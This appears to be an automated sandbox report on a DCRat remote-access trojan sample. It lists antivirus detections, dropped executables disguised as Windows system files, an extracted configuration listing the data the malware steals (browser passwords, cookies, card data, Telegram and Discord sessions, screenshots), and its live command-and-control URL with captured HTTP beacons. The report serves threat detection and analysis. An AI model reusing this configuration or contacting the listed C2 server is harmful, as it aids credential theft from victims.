Source: http://82.146.61.164/localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?gcnWXuE9MUipBZc=bVK2py9yji&Y5YSB7xC1sNfAEv19t=v6&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&gcnWXuE9MUipBZc=bVK2py9yji&Y5YSB7xC1sNfAEv19t=v6	Avira URL Cloud: Label: malware
Source: http://82.146.61.164/localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?2Axq4KFgntH6pOhfkXM061hX=JBth00EchN&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&2Axq4KFgntH6pOhfkXM061hX=JBth00EchN	Avira URL Cloud: Label: malware
Source: http://82.146.61.164/localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?lAhnJNadMavr7iaE=ZXVZQ&3Y9JuvB=DFJyj5HlpMCmNsD&Q7JLvKfEUznPKEqsL7rmyu=I9xsJXo7KUS2wlzq2jFduS1bkfT&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&lAhnJNadMavr7iaE=ZXVZQ&3Y9JuvB=DFJyj5HlpMCmNsD&Q7JLvKfEUznPKEqsL7rmyu=I9xsJXo7KUS2wlzq2jFduS1bkfT	Avira URL Cloud: Label: malware
Source: http://82.146.61.164	Avira URL Cloud: Label: malware
Source: http://82.146.61.164/localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e	Avira URL Cloud: Label: malware
Source: http://82.146.61.164/localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Long	Avira URL Cloud: Label: malware
Source: http://82.146.61.164/localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?LysFYqMsinte=I6ADlK1LX&ca5T=9SGrVSUxhWH4wgrENNx0VJZ7p&JxuQodWZtQgCI6xIcrdPEoq9ONHdbz3=CXIhDQ&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&LysFYqMsinte=I6ADlK1LX&ca5T=9SGrVSUxhWH4wgrENNx0VJZ7p&JxuQodWZtQgCI6xIcrdPEoq9ONHdbz3=CXIhDQ	Avira URL Cloud: Label: malware
Source: http://82.146.61.164/localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?Qwo2irmnoV=YhU7MQKNp5jw68qGmj2EO9Q&XsrVJW5pTKYX7gxvZm1Wq9s31l9E=QdZRbjejzETA4cwkSJGvHolI3&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&Qwo2irmnoV=YhU7MQKNp5jw68qGmj2EO9Q&XsrVJW5pTKYX7gxvZm1Wq9s31l9E=QdZRbjejzETA4cwkSJGvHolI3	Avira URL Cloud: Label: malware
Source: http://82.146.61.164/localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?nTpz4tBkEffHSxvJX2feX5v=PFt&EW3lilo=8ZvGO6YDsWpwXo96D7U&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&nTpz4tBkEffHSxvJX2feX5v=PFt&EW3lilo=8ZvGO6YDsWpwXo96D7U	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Program Files\Microsoft\OneDrive\ListSync\QeWHGGzCXwoQygZUiDI.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files\Microsoft\OneDrive\ListSync\QeWHGGzCXwoQygZUiDI.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files\Microsoft\OneDrive\ListSync\QeWHGGzCXwoQygZUiDI.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files\Microsoft\OneDrive\ListSync\QeWHGGzCXwoQygZUiDI.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files\Windows Mail\ctfmon.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342

Found malware configuration

Source: 00000000.00000002.2025245210.0000000012E8D000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: DCRat {"SCRT": "{\"e\":\"&\",\"d\":\",\",\"S\":\"-\",\"G\":\"~\",\"R\":\"<\",\"6\":\"%\",\"c\":\"^\",\"2\":\" \",\"A\":\")\",\"3\":\"$\",\"m\":\"#\",\"x\":\"(\",\"V\":\"`\",\"9\":\";\",\"5\":\"|\",\"v\":\"!\",\"I\":\"@\",\"N\":\".\",\"b\":\"_\",\"T\":\">\",\"J\":\"*\"}", "PCRT": "{\"2\":\"^\",\"Q\":\",\",\"F\":\"|\",\"I\":\"~\",\"d\":\")\",\"R\":\"_\",\"t\":\".\",\"m\":\"%\",\"W\":\"!\",\"U\":\"&\",\"Y\":\"@\",\"X\":\"*\",\"C\":\"`\",\"G\":\"$\",\"b\":\"#\",\"5\":\"(\",\"Z\":\"<\",\"x\":\"-\",\"1\":\" \",\"B\":\";\",\"N\":\">\"}", "TAG": "YBA", "MUTEX": "DCR_MUTEX-0SJnAuGLGjvH4UgcW6Na", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 2, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false, "H1": "http://82.146.61.164/localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/@=wWYj9GbwdHc0RHalJXdjV2U", "H2": "http://82.146.61.164/localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/@=wWYj9GbwdHc0RHalJXdjV2U", "T": "0"}

Multi AV Scanner detection for dropped file

Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	ReversingLabs: Detection: 78%
Source: C:\Program Files\Microsoft\OneDrive\ListSync\QeWHGGzCXwoQygZUiDI.exe	ReversingLabs: Detection: 78%
Source: C:\Program Files\Windows Mail\ctfmon.exe	ReversingLabs: Detection: 78%
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	ReversingLabs: Detection: 78%
Source: C:\Users\Default\Saved Games\QeWHGGzCXwoQygZUiDI.exe	ReversingLabs: Detection: 78%
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	ReversingLabs: Detection: 78%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	ReversingLabs: Detection: 78%
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	ReversingLabs: Detection: 78%

Multi AV Scanner detection for submitted file

Source: B9exXW7c3t.exe

ReversingLabs: Detection: 78%

Machine Learning detection for dropped file

Source: C:\Program Files\Microsoft\OneDrive\ListSync\QeWHGGzCXwoQygZUiDI.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft\OneDrive\ListSync\QeWHGGzCXwoQygZUiDI.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft\OneDrive\ListSync\QeWHGGzCXwoQygZUiDI.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft\OneDrive\ListSync\QeWHGGzCXwoQygZUiDI.exe	Joe Sandbox ML: detected
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Windows Mail\ctfmon.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Joe Sandbox ML: detected
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: B9exXW7c3t.exe

Joe Sandbox ML: detected

Source: B9exXW7c3t.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Directory created: C:\Program Files\Microsoft\OneDrive\ListSync\QeWHGGzCXwoQygZUiDI.exe	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Directory created: C:\Program Files\Microsoft\OneDrive\ListSync\2e26acd4fd0504	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Directory created: C:\Program Files\Windows Mail\ctfmon.exe	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Directory created: C:\Program Files\Windows Mail\26c12092da979c	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Directory created: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Directory created: C:\Program Files\Common Files\System\msadc\en-US\cc11b995f2a76d	Jump to behavior

Source: B9exXW7c3t.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://82.146.61.164/localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/@=wWYj9GbwdHc0RHalJXdjV2U

Source: Joe Sandbox View

ASN Name: THEFIRST-ASRU THEFIRST-ASRU

Source: global traffic	HTTP traffic detected: GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?Qwo2irmnoV=YhU7MQKNp5jw68qGmj2EO9Q&XsrVJW5pTKYX7gxvZm1Wq9s31l9E=QdZRbjejzETA4cwkSJGvHolI3&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&Qwo2irmnoV=YhU7MQKNp5jw68qGmj2EO9Q&XsrVJW5pTKYX7gxvZm1Wq9s31l9E=QdZRbjejzETA4cwkSJGvHolI3 HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 82.146.61.164Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?Qwo2irmnoV=YhU7MQKNp5jw68qGmj2EO9Q&XsrVJW5pTKYX7gxvZm1Wq9s31l9E=QdZRbjejzETA4cwkSJGvHolI3&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&Qwo2irmnoV=YhU7MQKNp5jw68qGmj2EO9Q&XsrVJW5pTKYX7gxvZm1Wq9s31l9E=QdZRbjejzETA4cwkSJGvHolI3 HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 82.146.61.164
Source: global traffic	HTTP traffic detected: GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 82.146.61.164Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 82.146.61.164
Source: global traffic	HTTP traffic detected: GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?ZVSxTWRKIX4WAKi9eeqlLhfkTFe6=YMPLZX6E9wpNIWg&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&ZVSxTWRKIX4WAKi9eeqlLhfkTFe6=YMPLZX6E9wpNIWg HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 82.146.61.164Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?ZVSxTWRKIX4WAKi9eeqlLhfkTFe6=YMPLZX6E9wpNIWg&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&ZVSxTWRKIX4WAKi9eeqlLhfkTFe6=YMPLZX6E9wpNIWg HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 82.146.61.164
Source: global traffic	HTTP traffic detected: GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?LysFYqMsinte=I6ADlK1LX&ca5T=9SGrVSUxhWH4wgrENNx0VJZ7p&JxuQodWZtQgCI6xIcrdPEoq9ONHdbz3=CXIhDQ&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&LysFYqMsinte=I6ADlK1LX&ca5T=9SGrVSUxhWH4wgrENNx0VJZ7p&JxuQodWZtQgCI6xIcrdPEoq9ONHdbz3=CXIhDQ HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 82.146.61.164Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?LysFYqMsinte=I6ADlK1LX&ca5T=9SGrVSUxhWH4wgrENNx0VJZ7p&JxuQodWZtQgCI6xIcrdPEoq9ONHdbz3=CXIhDQ&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&LysFYqMsinte=I6ADlK1LX&ca5T=9SGrVSUxhWH4wgrENNx0VJZ7p&JxuQodWZtQgCI6xIcrdPEoq9ONHdbz3=CXIhDQ HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 82.146.61.164
Source: global traffic	HTTP traffic detected: GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?md25=UA&vb=r948xSj667Ud7PLnWmgd&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&md25=UA&vb=r948xSj667Ud7PLnWmgd HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 82.146.61.164Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?md25=UA&vb=r948xSj667Ud7PLnWmgd&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&md25=UA&vb=r948xSj667Ud7PLnWmgd HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 82.146.61.164
Source: global traffic	HTTP traffic detected: GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 82.146.61.164Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 82.146.61.164
Source: global traffic	HTTP traffic detected: GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?nTpz4tBkEffHSxvJX2feX5v=PFt&EW3lilo=8ZvGO6YDsWpwXo96D7U&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&nTpz4tBkEffHSxvJX2feX5v=PFt&EW3lilo=8ZvGO6YDsWpwXo96D7U HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 82.146.61.164Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?nTpz4tBkEffHSxvJX2feX5v=PFt&EW3lilo=8ZvGO6YDsWpwXo96D7U&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&nTpz4tBkEffHSxvJX2feX5v=PFt&EW3lilo=8ZvGO6YDsWpwXo96D7U HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 82.146.61.164
Source: global traffic	HTTP traffic detected: GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?gcnWXuE9MUipBZc=bVK2py9yji&Y5YSB7xC1sNfAEv19t=v6&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&gcnWXuE9MUipBZc=bVK2py9yji&Y5YSB7xC1sNfAEv19t=v6 HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 82.146.61.164Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?gcnWXuE9MUipBZc=bVK2py9yji&Y5YSB7xC1sNfAEv19t=v6&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&gcnWXuE9MUipBZc=bVK2py9yji&Y5YSB7xC1sNfAEv19t=v6 HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 82.146.61.164
Source: global traffic	HTTP traffic detected: GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?2Axq4KFgntH6pOhfkXM061hX=JBth00EchN&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&2Axq4KFgntH6pOhfkXM061hX=JBth00EchN HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 82.146.61.164Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?2Axq4KFgntH6pOhfkXM061hX=JBth00EchN&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&2Axq4KFgntH6pOhfkXM061hX=JBth00EchN HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 82.146.61.164
Source: global traffic	HTTP traffic detected: GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?lAhnJNadMavr7iaE=ZXVZQ&3Y9JuvB=DFJyj5HlpMCmNsD&Q7JLvKfEUznPKEqsL7rmyu=I9xsJXo7KUS2wlzq2jFduS1bkfT&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&lAhnJNadMavr7iaE=ZXVZQ&3Y9JuvB=DFJyj5HlpMCmNsD&Q7JLvKfEUznPKEqsL7rmyu=I9xsJXo7KUS2wlzq2jFduS1bkfT HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 82.146.61.164Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?lAhnJNadMavr7iaE=ZXVZQ&3Y9JuvB=DFJyj5HlpMCmNsD&Q7JLvKfEUznPKEqsL7rmyu=I9xsJXo7KUS2wlzq2jFduS1bkfT&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&lAhnJNadMavr7iaE=ZXVZQ&3Y9JuvB=DFJyj5HlpMCmNsD&Q7JLvKfEUznPKEqsL7rmyu=I9xsJXo7KUS2wlzq2jFduS1bkfT HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 82.146.61.164

Source: unknown	TCP traffic detected without corresponding DNS query: 82.146.61.164
Source: unknown	TCP traffic detected without corresponding DNS query: 82.146.61.164
Source: unknown	TCP traffic detected without corresponding DNS query: 82.146.61.164
Source: unknown	TCP traffic detected without corresponding DNS query: 82.146.61.164
Source: unknown	TCP traffic detected without corresponding DNS query: 82.146.61.164
Source: unknown	TCP traffic detected without corresponding DNS query: 82.146.61.164
Source: unknown	TCP traffic detected without corresponding DNS query: 82.146.61.164
